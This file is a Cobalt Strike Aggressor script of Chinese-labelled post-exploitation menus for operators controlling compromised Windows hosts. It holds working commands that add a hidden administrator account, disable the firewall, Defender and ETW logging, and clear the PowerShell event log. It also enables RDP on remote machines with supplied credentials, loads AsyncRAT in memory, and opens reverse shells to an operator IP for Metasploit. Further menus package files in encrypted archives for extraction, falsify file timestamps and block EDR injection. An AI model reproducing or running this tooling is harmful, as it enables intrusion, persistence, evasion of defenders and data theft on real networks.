##############################
#                            #
#                            #
#                            #
#       xway.cn@panda8       #
#       secquan.org@panda8   #
#		t00ls.com@panda8     #
#                            #
#                            #
#                            #
##############################
menu "系统操作" {


			item "远程下载文件" {
			$bid = $1['@'];
			$dialog = dialog("远程下载文件", %(OutFile => "C:\\Windows\\Temp\\123.exe",url => "",,bid => $bid), &net_download);
			dialog_description($dialog, "远程下载文件,自定义下载路径与文件名");
			drow_text($dialog, "url", "url:  ");
			drow_text($dialog, "OutFile",  "保存路径: "); 				
            dbutton_action($dialog, "下载");
			dialog_show($dialog);
        }
sub net_download {
	$arg = join(' ',  @("wget",$3['url'],"-OutFile",$3['OutFile']));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	

			item "复制文件/文件夹" {
			$bid = $1['@'];
			$dialog = dialog("复制文件/文件夹", %(filepath => "C:\\Windows\\Temp",outpath => "C:\\windows",,bid => $bid), &net_copy);
			dialog_description($dialog, "可以复制文件与文件夹,文件路径格式:c:\\windows\\temp\\123.exe,文件夹格式c:\\windows\\temp");
			drow_text($dialog, "filepath", "filepath:  ");
			drow_text($dialog, "outpath",  "outpath: "); 				
            dbutton_action($dialog, "复制");
			dialog_show($dialog);
        }
sub net_copy {
	$arg = join(' ',  @("copy",$3['filepath'],$3['outpath']));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	

menu "用户操作" {
				item "激活guest用户" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net user guest /active:yes");
			}
		}

				item "建立用户并加入管理员组" {
                    $bid = $1['@'];
                    $Dialog = dialog("添加本地管理员用户",%(user => "admin$", pass => "admin@123.", "groups" => "administrators", bid => $bid),&add_localuser);
                    dialog_description($Dialog, "添加本地管理员用户"); 
                    drow_text($Dialog, "user", "user: ");
                    drow_text($Dialog, "pass", "pass: ");
                    drow_text($Dialog, "groups", "groups: ");
                    dbutton_action($Dialog, "运行");
                    dialog_show($Dialog);
		}
                sub add_localuser{
    				local('$Name');
    				$Name = $3['user'];
    				$Pwd = $3['pass'];
    				$groups = $3['groups'];
    				bshell($bid, "net user $Name $Pwd /add  && net localgroup $groups $Name /add");
				}


menu "Api添加本地用户" {
			item "添加用户" {
			$bid = $1['@'];
			$dialog = dialog("添加用户", %(user => "admin",pass => "admin@123",groups => "administrators",bid => $bid), &api_add);
			dialog_description($dialog, "调用Windows Api添加用户。");
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");	
			drow_text($dialog, "groups", "groups:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub api_add {
		$arg = join(' ', @("-u",$3['user'],"-p",$3['pass'],"-g",$3['groups']));
		bexecute_assembly($bid, script_resource("/script/BypassAddUser.exe"), $arg);
}

			item "修改用户密码" {
			$bid = $1['@'];
			$dialog = dialog("修改用户密码", %(user => "admin",pass => "admin@123",bid => $bid), &api_change);
			dialog_description($dialog, "调用Windows Api修改用户密码。");
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub api_change {
		$arg = join(' ', @("-c",$3['user'],"",$3['pass']));
		bexecute_assembly($bid, script_resource("/script/BypassAddUser.exe"), $arg);
}

			item "删除用户" {
			$bid = $1['@'];
			$dialog = dialog("删除用户", %(user => "admin",bid => $bid), &api_del);
			dialog_description($dialog, "调用Windows Api添加用户。");
			drow_text($dialog, "user", "user:  ");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub api_del {
		$arg = join(' ', @("-d",$3['user']));
		bexecute_assembly($bid, script_resource("/script/BypassAddUser.exe"), $arg);
}

}

menu "Api添加本地用户" {
			item "添加用户" {
			$bid = $1['@'];
			$dialog = dialog("添加用户", %(user => "admin",pass => "admin@123",bid => $bid), &noNetApiAdd_add);
			dialog_description($dialog, "调用Windows Api添加用户。");
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub noNetApiAdd_add {
		$arg = join(' ', @("-u",$3['user'],"-p",$3['pass']));
		bexecute_assembly($bid, script_resource("/script/noNetApiAdd.exe"), $arg);
}

			item "添加用户到组" {
			$bid = $1['@'];
			$dialog = dialog("修改用户密码", %(user => "admin",group => "administrators",bid => $bid), &noNetApiAdd_group);
			dialog_description($dialog, "调用Windows Api修改用户密码。");
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "group", "group:  ");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub noNetApiAdd_group {
		$arg = join(' ', @("-u",$3['user'],"-g",$3['group']));
		bexecute_assembly($bid, script_resource("/script/noNetApiAdd.exe"), $arg);
}

			item "添加用户并添加到组" {
			$bid = $1['@'];
			$dialog = dialog("添加用户并添加到组", %(user => "admin",pass => "admin@123",groups => "administrators",bid => $bid), &noNetApiAdd_adds);
			dialog_description($dialog, "调用Windows Api添加用户。");
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");	
			drow_text($dialog, "groups", "groups:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub noNetApiAdd_adds {
		$arg = join(' ', @("-u",$3['user'],"-p",$3['pass'],"-g",$3['groups']));
		bexecute_assembly($bid, script_resource("/script/noNetApiAdd.exe"), $arg);
}

}

        item "DLL添加用户" {
            $bid = $1['@'];
            $Dialog = dialog("windows api添加用户",%(user => "", pass => "", bid => $bid),&add_localuser);
            dialog_description($Dialog, "windows api添加用户");
            drow_text($Dialog, "user", "user: ");
            drow_text($Dialog, "pass", "pass: ");
            dbutton_action($Dialog, "运行");
            dialog_show($Dialog);
        }

        sub add_localuser {
            local('$Name');
            $Name = $3['user'];
            $Pwd = $3['pass'];
            $args = $Name." ".$Pwd." 1";
            bdllspawn($bid, script_resource("/script/ReflectiveDll.x64.dll"), $args, "ReflectiveDll", 5000, false);
        }
		}
		
		
		menu "关闭防火墙" {
				item "win2003之前" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "netsh firewall set opmode disable");
			}
		}
				item "win2003之后" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "netsh advfirewall set allprofiles state off");
			}
		}
		}
    menu "RDP相关" {

				item "获取RDP端口" {
            local('$bid');
            foreach $bid ($1){
                blog($1, "Check Rdp Open Port");
                bpowershell_import($bid, script_resource("/script/RegRdpPort.ps1"));
                bpowerpick($bid,"RegRdpPort");
                bshell($bid,"wevtutil cl \"Windows PowerShell\"");
                }
            }

menu "开启本地主机RDP" {
				item "注册表开启RDP"{
            local('$bid');
                $bid = $1;
                if (!-isadmin $bid['@']){
                    show_error("Permission Denied!");
                }
                else{
                    bshell($bid,"REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");
                }
            }

				item "开启RDP-Ladon"{
				bexecute_assembly($1, script_resource('/script/Ladon.exe'), "Open3389");
            }

				item "开启RDP-API" {
				$bid = $1;
				$dialog = dialog("开启RDP-API", %(Type => "-rdp0",bid => $bid), &rdp_api);
				dialog_description($dialog, "rdp0表示开启3389,rdp1表示关闭3389,query表示查询3389状态");
				drow_combobox($dialog, "Type", "Type:", @("-rdp0", "-rdp1","-query"));
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub rdp_api {
	bexecute_assembly($bid, script_resource("/script/Sharp3389.exe"), $3['Type']);
}
			

	menu "开启RDP-WMI" {
				item "开启RDP-WMI" {
				local('$bid');
				foreach $bid ($1){
				bshell($1, "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1");
        }
	}
				item "关闭RDP-WMI" {
				local('$bid');
				foreach $bid ($1){
				bshell($1, "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0");
        }
	}
}
}

menu "开启远程主机RDP" {
				item "开启远程主机RDP(低版本)" {
				$bid = $1['@'];
				$dialog = dialog("开启远程主机RDP(低版本)", %(ip => "",user => "",pass => "",bid => $bid), &rdp_ro1);
				dialog_description($dialog, "支持系统Win2k、XP、Win2k3");
				drow_text($dialog, "ip",  "ip: "); 
				drow_text($dialog, "user",  "user: "); 
				drow_text($dialog, "pass",  "pass: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub rdp_ro1{
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] PATH win32_terminalservicesetting WHERE (__Class!=\"\") CALL SetAllowTSConnections 1");
} 

				item "关闭远程主机RDP(低版本)" {
				$bid = $1['@'];
				$dialog = dialog("开启远程主机RDP(低版本)", %(ip => "",user => "",pass => "",bid => $bid), &rdp_roc1);
				dialog_description($dialog, "支持系统Win2k、XP、Win2k3");
				drow_text($dialog, "ip",  "ip: "); 
				drow_text($dialog, "user",  "user: "); 
				drow_text($dialog, "pass",  "pass: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub rdp_roc1{
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] PATH win32_terminalservicesetting WHERE (__Class!=\"\") CALL SetAllowTSConnections 0");
} 

				item "开启远程主机RDP(高版本)" {
				$bid = $1['@'];
				$dialog = dialog("开启远程主机RDP(高版本)", %(ip => "",user => "",pass => "",hostname => "",bid => $bid), &rdp_ro2);
				dialog_description($dialog, "支持系统Win7、Win2k8、Win8.1、Win10、2012、2016");
				drow_text($dialog, "ip",  "ip: "); 
				drow_text($dialog, "user",  "user: "); 
				drow_text($dialog, "pass",  "pass: "); 
				drow_text($dialog, "hostname",  "hostname: ");
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub rdp_ro2{
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] RDTOGGLE WHERE ServerName=\'$3['hostname']\' call SetAllowTSConnections 1");
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] process call create \'cmd.exe /c REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\'");
} 
				item "关闭远程主机RDP(高版本)" {
				$bid = $1['@'];
				$dialog = dialog("开启远程主机RDP(高版本)", %(ip => "",user => "",pass => "",hostname => "",bid => $bid), &rdp_roc2);
				dialog_description($dialog, "支持系统Win7、Win2k8、Win8.1、Win10、2012、2016");
				drow_text($dialog, "ip",  "ip: "); 
				drow_text($dialog, "user",  "user: "); 
				drow_text($dialog, "pass",  "pass: "); 
				drow_text($dialog, "hostname",  "hostname: ");
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub rdp_roc2{
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] RDTOGGLE WHERE ServerName=\'$3['hostname']\' call SetAllowTSConnections 0");
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] process call create \'cmd.exe /c REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f\'");
} 
}

	item "本地主机防火墙放行RDP规则" {
        local('$bid');
        foreach $bid ($1){
            bshell($1, "netsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow");
        }
	}

				item "远程主机防火墙放行RDP规则" {
				$bid = $1['@'];
				$dialog = dialog("远程主机防火墙放行RDP规则", %(ip => "",user => "",pass => "",bid => $bid), &rdp_fire);
				dialog_description($dialog, "远程主机防火墙放行RDP规则");
				drow_text($dialog, "ip",  "ip: "); 
				drow_text($dialog, "user",  "user: "); 
				drow_text($dialog, "pass",  "pass: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub rdp_fire{
	bshell($bid, "wmic /node:$3['ip'] /user:$3['user'] /password:$3['pass'] process call create \'cmd.exe /c netsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow\'");
} 
	
				item "允许多个RDP会话(win10)" {
					bexecute_assembly($1, script_resource("/script/SharpDoor.exe"), "");
		}
        }

			    menu "隐藏文件" {
			    item "隐藏" {
             prompt_text("文件路径", "", lambda({
            bshell(@ids, "attrib +h +s $1");
        }, @ids => $1));
    }	
			    item "显示" {
             prompt_text("文件路径", "", lambda({
            bshell(@ids, "attrib -h -s $1");
        }, @ids => $1));
    }
	}

				menu "关闭defender" {
				item "组策略关闭defender" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /d 1 /t REG_DWORD");
			}
		}

				item "关闭defender" {
					bexecute_assembly($1, script_resource("/script/dis_defender.exe"), "");
		}
		}

menu "隐藏.net行为" {
				item "cmd命令" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "set COMPlus_ETWEnabled=0");
			}
		}
				item "blocketw" {
					bexecute_assembly($1, script_resource("/script/blocketw.exe"), "");
		}
		}


		 menu "安装.net4.5" {	
			item "下载.net" {
			$bid = $1['@'];
			$dialog = dialog("下载.net", %(downPath => "C:\\Windows\\Temp\\",url => "https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe",,bid => $bid), &net_download);
			dialog_description($dialog, "下载过后文件名不变。");
			drow_text($dialog, "url", "url:  ");
			drow_text($dialog, "downPath",  "下载路径: "); 				
            dbutton_action($dialog, "下载");
			dialog_show($dialog);
        }
sub net_download {
	bcd($bid, $3['downPath']);
	$arg = join(' ',  @("wget",$3['url']));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	


			item "安装.net" {
			$bid = $1['@'];
			$dialog = dialog("安装.net", %(filename => "NDP452-KB2901907-x86-x64-AllOS-ENU.exe",filepath => "C:\\Windows\\Temp\\",bid => $bid), &net_install);
			drow_combobox($dialog, "filename", "filename:", @("NDP452-KB2901907-x86-x64-AllOS-ENU.exe"));
			drow_text($dialog, "filepath",  "文件路径: "); 
			dialog_description($dialog, "安装.net。");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }

sub net_install{
	bcd($bid, $3['filepath']);
	bshell($bid, "$3['filename'] /Q /NORESTART /lcid 1033");
}  

			item "取消安装" {
			$bid = $1['@'];
			$dialog = dialog("安装.net", %(filename => "NDP452-KB2901907-x86-x64-AllOS-ENU.exe",bid => $bid), &net_off);
			drow_combobox($dialog, "filename", "filename:", @("NDP452-KB2901907-x86-x64-AllOS-ENU.exe"));
			dialog_description($dialog, "取消安装。");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }

sub net_off{
	bshell($bid, "taskkill -f /im $3['filename']");
}  

			item "删除安装包" {
			$bid = $1['@'];
			$dialog = dialog("删除安装包", %(filename => "NDP452-KB2901907-x86-x64-AllOS-ENU.exe",bid => $bid), &net_del);
			drow_combobox($dialog, "filename", "filename:", @("NDP452-KB2901907-x86-x64-AllOS-ENU.exe"));
			dialog_description($dialog, "删除安装包");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }

sub net_del{
	bshell($bid, "del /f /s /q $3['filename']");
} 


		}

				item "启用.net3.5" {
					bexecute_assembly($1, script_resource("/script/Ladon.exe"), "EnableDotNet");
		}


			item "设置beacon当前路径" {
				$bid = $1;
				$dialog = dialog("设置beacon当前路径", %(Path => "C:\\Windows\\Temp\\", bid => $bid), &beacon_path);
				drow_text($dialog, "Path",  "设置路径: "); 	
				dbutton_action($dialog, "设置");
				dialog_show($dialog);
        }
sub beacon_path {

    bcd($bid, $3['Path']);
    }
	
	    menu "开启HTTP服务" {
			item "上传chfs" {
				$bid = $1;
				$dialog = dialog("上传chfs", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &chfs_upload);
				drow_text($dialog, "UploadPath",  "上传路径: "); 	
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
        }
sub chfs_upload {

    bcd($bid, $3['UploadPath']);

        bupload($bid, script_resource("/script/chfs.exe"));
    }
			item "运行chfs" {
			$bid = $1['@'];
			$dialog = dialog("运行chfs", %(port => "8080",path => "c:/",user => "admin",pass => "admin",permission => "r",bid => $bid), &chfs_run);
			dialog_description($dialog, "开启HTTP服务，r为只读权限，rw为读写权限。");
			drow_text($dialog, "port", "port:  ");	
			drow_text($dialog, "path", "path:  ");	
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");			
			drow_combobox($dialog, "permission", "permission", @("r", "rw"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }

sub chfs_run{
    local('$port $path $user $pass $permission');
    $port = $3['port'];
	$path = $3['path'];
	$user = $3['user'];
	$pass = $3['pass'];
	$permission = $3['permission'];
	bshell($bid, "chfs.exe --port= $+ $port --path=\" $+ $path\" --rule=\"::| $+ $user $+ : $+ $pass $+ : $+ $permission\" ");
}

			item "关闭chfs"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "taskkill -f /im chfs.exe");
			}
		}

        	item "删除chfs"{
        	local('$bid');
        	foreach $bid ($1){
            	bshell($1, "del /f /s /q chfs.exe");
        	}
		}
    }

			item "获取HTML源码"{
				$bid = $1;
				$dialog = dialog("获取HTML源码", %(url => "http://127.0.0.1",bid => $bid), &gethtml);
				dialog_description($dialog, "获取HTML源码");
				drow_text($dialog, "url", "url:  ");				
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub gethtml {
	$arg = join(' ', @("gethtml",$3['url']));
	bexecute_assembly($bid, script_resource("/script/Ladon.exe"), $arg);
}

			item "AsyncRAT上线" {
				$bid = $1;
				$dialog = dialog("内存加载AsyncRAT服务端上线", %(bid => $bid), &asyncrat);
				drow_file($dialog, "server", "server: ");			
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }	
sub asyncrat {
        bexecute_assembly($bid, $3['server']);
    }

	    menu "MSF联动" {
			item "TCP协议shell" {
			$bid = $1['@'];
			$dialog = dialog("TCP", %(ip => "192.168.1.1",port => "8888",bid => $bid), &tcp_shell);
			dialog_description($dialog, "nc:nc shell###shell:MSF shell###meter:MSF meter shell");
			drow_combobox($dialog, "ReverseTcp", "ReverseTcp:", @("ReverseTcp"));
			drow_combobox($dialog, "type", "type:", @("nc","shell","meter"));
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "port", "port:  ");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub tcp_shell {
	$arg = join(' ',  @($3['ReverseTcp'],$3['ip'],$3['port'],$3['type']));
	bexecute_assembly($bid, script_resource("/script/Ladon.exe"), $arg);
}		

			item "http协议shell" {
			$bid = $1['@'];
			$dialog = dialog("HTTP", %(ip => "192.168.1.1",port => "8888",bid => $bid), &http_shell);
			dialog_description($dialog, "http与https均是meter");
			drow_combobox($dialog, "type", "type:", @("ReverseHttp","ReverseHttps"));
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "port", "port:  ");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub http_shell {
	$arg = join(' ',  @($3['type'],$3['ip'],$3['port']));
	bexecute_assembly($bid, script_resource("/script/Ladon.exe"), $arg);
}	
		
		}

menu "压缩打包文件" {
			item "加密压缩" {
			$bid = $1['@'];
			$dialog = dialog("压缩打包文件", %(path => "c:\\123.txt",pass => "123456",bid => $bid), &EncryptedZIP);	
			drow_text($dialog, "path", "path:  ");
			drow_text($dialog, "pass", "pass:  ");	
			dialog_description($dialog, "对目录或文件进行加密压缩,压缩包提取到本地需要用EncryptedZIP解密");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub EncryptedZIP {
	$arg = join('', @("encrypt $3['path'] $3['pass']"));
	bexecute_assembly($bid, script_resource("/script/EncryptedZIP.exe"), $arg);
}

			item "不加密压缩" {
			$bid = $1['@'];
			$dialog = dialog("压缩打包文件", %(path => "c:\\windows\\temp",outpath => "c:\\windows\\temp\\123.zip",bid => $bid), &EncryptedZIP_nopass);	
			drow_text($dialog, "path", "path:  ");
			drow_text($dialog, "outpath", "outpath:  ");	
			dialog_description($dialog, "对目录或文件进行压缩");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub EncryptedZIP_nopass {
	$arg = join('', @("$3['path'] $3['outpath']"));
	bexecute_assembly($bid, script_resource("/script/SharpZip.exe"), $arg);
}

}

			item "修改文件时间" {
			$bid = $1['@'];
			$dialog = dialog("修改文件时间", %(filepath => "C:\\Windows\\Temp\\1.txt",modifytime => "2019-02-19 01:01:01.111",bid => $bid), &file_time);	
			drow_text($dialog, "filepath", "文件路径:  ");
			drow_text($dialog, "modifytime", "修改时间:  ");		
			dialog_description($dialog, "修改文件创建时间、修改时间、访问时间");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub file_time {
		bexecute_assembly($bid, script_resource("/script/MaceTrap.exe"), "-s $3['filepath'] -t \"$3['modifytime']\"");
}	

			item "解析域名" {
			$bid = $1['@'];
			$dialog = dialog("解析域名", %(domain => "microsoft.com",bid => $bid), &net_domain);
			dialog_description($dialog, "解析域名");
			drow_text($dialog, "domain", "域名:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub net_domain {
	$arg = join(' ',  @("Resolve-DnsName",$3['domain']));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	
			item "计算文件行数" {
			$bid = $1['@'];
			$dialog = dialog("计算文件行数", %(filename => "C:\\Windows\\WindowsUpdate.log",bid => $bid), &net_gc);
			dialog_description($dialog, "计算文件行数");
			drow_text($dialog, "filename", "filename:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub net_gc {
	$arg = join(' ',  @("gc",$3['filename'],"| measure"));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	

			item "查看文件内容" {
			$bid = $1['@'];
			$dialog = dialog("查看文件内容", %(filepath => "c:\\windows\\temp\\123.txt",bid => $bid), &net_type);
			dialog_description($dialog, "查看文件内容");
			drow_text($dialog, "filepath", "filepath:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub net_type {
	$arg = join(' ',  @("Get-Content",$3['filepath']));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	

menu "保护beacon进程" {
			item "拒绝非微软签名的dll注入" {
			$bid = $1['@'];
			$dialog = dialog("拒绝非微软签名的dll注入", %(bid => $bid), &blockdlls);
			dialog_description($dialog, "该功能使beacon进程拒绝非微软签名的dll注入,有效防止EDR等安全软件");				
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub blockdlls {
		bblockdlls($bid, "start");
}	


}
}